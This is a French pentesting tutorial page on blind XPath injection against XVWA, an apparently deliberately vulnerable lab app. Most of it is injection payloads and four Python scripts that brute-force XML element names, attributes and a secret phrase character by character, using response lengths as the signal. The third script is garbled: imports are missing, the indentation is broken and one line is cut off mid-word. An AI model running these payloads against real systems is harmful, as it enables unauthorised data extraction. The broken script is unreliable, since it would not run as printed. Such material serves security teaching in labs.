XPath Injection Techniques - Pentesting Web

Il s'agit de la page web où vous saisissez un numéro de café et d'autres champs tels que l'id, le titre, la description, etc.

Voici le fichier XML que nous devrions essayer d'obtenir le contenu :

Étapes d'injection:

Filtrer l'élément principal XML :

Filtrer avec substring si la première lettre commence par C de la mot Coffees :

1' and substring(name(/*[1]),1,1)='C

Ce script en Python automatise tout le processus :

#!/usr/bin/python3
from pwn import *
import requests
import time
import sys
import pdb
import string
import signal

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.133/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters

def xPathInjection():
    data = ""
    p1 = log.progress("Brute force attack")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Data")
    for position in range(1, 8):
        for character in characters:
            post_data = {
                'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
                'submit': ''
            }

            r = requests.post(main_url, data=post_data)
            if len(r.text) != 8681:
                data += character
                p2.status(data)
                break
    p1.success("Brute force attack concluded")
    p2.success(data)

if __name__ == '__main__':
    xPathInjection()

Filtrer la sous-étiquette XML:

Filtrer avec substring si la première lettre commence par C du mot Coffee :

1' and substring(name(/*[1]/*[1]),1,1)='C

Ce script en Python automatise tout le processus :

#!/usr/bin/python3
from pwn import *
import requests
import time
import sys
import pdb
import string
import signal

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.133/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters

def xPathInjection():
    data = ""
    p1 = log.progress("Brute force attack")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Data")
    for position in range(1, 7):
        for character in characters:
            post_data = {
                'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
                'submit': ''
            }
            r = requests.post(main_url, data=post_data)
            if len(r.text) != 8686:
                data += character
                p2.status(data)
                break
    p1.success("Brute force attack concluded")
    p2.success(data)

if __name__ == '__main__':
    xPathInjection()

Filtrer les attributs XML :

Filtrer avec substring si la première lettre commence par I du mot ID :

1' and substring(name(/*[1]/*[1]/*[1]),1,1)='I

Ce script en Python automatise tout le processus :

#!/usr/bin/python3
 import time
 import sys
 import pdb
 import string
 import signal
 
 def def_handler(sig, frame):
     print("\n\n[!] Exiting...\n")
     sys.exit(1)
 
 # Ctrl+C
 signal.signal(signal.SIGINT, def_handler)
 
 main_url = "http://192.168.71.133/xvwa/vulnerabilities/xpath/"
 characters = string.ascii_letters
 
 def xPathInjection():
     data = ""
     p1 = log.progress("Brute force attack")
     p1.status("Starting brute force attack")
     time.sleep(2)
     p2 = log.progress("Data")
     for first_position in range(1, 6):
         for second_position in range(1,21):
             for character in characters:
                 post_data = {
                     'search': "1' and substring(name(/*[1]/*[1]/*[%d]),%d,1)='%s" % (first_positio
                     'submit': ''
                 }
                 r = requests.post(main_url, data=post_data)
                 if len(r.text) != 8691 and len(r.text) != 8692:
                     data += character
                     p2.status(data)
                     break
 
         if first_position != 5:
             data += ":"
 
     p1.success("Brute force attack concluded")
     p2.success(data)
 
 if __name__ == '__main__':
     xPathInjection()

Filtrer les attributs XML du contenu :

Nous filtrons avec la sous-chaîne si la première lettre commence par T dans la phrase secrète :

1' and substring(Secret,1,1)='T

Ce script en Python automatise tout le processus :

#!/usr/bin/python3
from pwn import *
import requests
import time
import sys
import pdb
import string
import signal

def def_handler(sig, frame):
    print("\n\n[!] Exiting...\n")
    sys.exit(1)

# Ctrl+C
signal.signal(signal.SIGINT, def_handler)

main_url = "http://192.168.71.133/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters + ' '

def xPathInjection():
    data = ""
    p1 = log.progress("Brute force attack")
    p1.status("Starting brute force attack")
    time.sleep(2)
    p2 = log.progress("Data")
    for first_position in range(1, 100):
        for character in characters:
            post_data = {
                'search': "1' and substring(Secret,%d,1)='%s" % (first_position, character),
                'submit': ''
            }
            r = requests.post(main_url, data=post_data)
            if len(r.text) != 8676 and len(r.text) !=8677:
                data += character
                p2.status(data)
                break

    p1.success("Brute force attack concluded")
    p2.success(data)

if __name__ == '__main__':
    xPathInjection()

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?